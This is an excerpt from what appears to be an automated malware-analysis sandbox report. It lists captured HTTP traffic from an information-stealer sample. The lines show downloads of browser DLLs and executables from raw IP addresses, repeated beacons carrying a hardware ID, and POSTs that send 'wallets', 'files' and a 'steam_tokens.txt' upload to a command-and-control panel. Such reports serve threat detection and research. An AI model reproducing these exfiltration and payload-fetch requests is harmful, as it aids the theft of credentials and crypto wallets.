                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014797001&unit=246122658369
                          Source: global trafficHTTP traffic detected: GET /files/7850253564/4ZD5C3i.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014798001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBAECAKKFCBFIEGCBKHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="message"wallets------GIEBAECAKKFCBFIEGCBK--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 2d 2d 0d 0a Data Ascii: ------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="message"files------IDHCGDAFBKFIDHJJJDHC--
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file"------CGHCGIIDGDAKFIEBKFCF--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 2d 2d 0d 0a Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="message"ybncbhylepme------DAEBKKKEHDHDGDGCFBKJ--
                          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 2d 2d 0d 0a Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------CFCFHJDBKJKEBFHJEHII--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAAEGDBKKECBGIJEBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 37 38 34 45 46 46 34 43 41 34 32 39 33 36 30 35 30 34 37 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 42 41 41 45 47 44 42 4b 4b 45 43 42 47 49 4a 45 42 2d 2d 0d 0a Data Ascii: ------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="hwid"DB784EFF4CA42936050476------JJDBAAEGDBKKECBGIJEBContent-Disposition: form-data; name="build"stok------JJDBAAEGDBKKECBGIJEB--
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 12 Dec 2024 07:55:00 GMTIf-None-Match: "675a96d4-60200"
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 34 37 39 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014799001&unit=246122658369
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
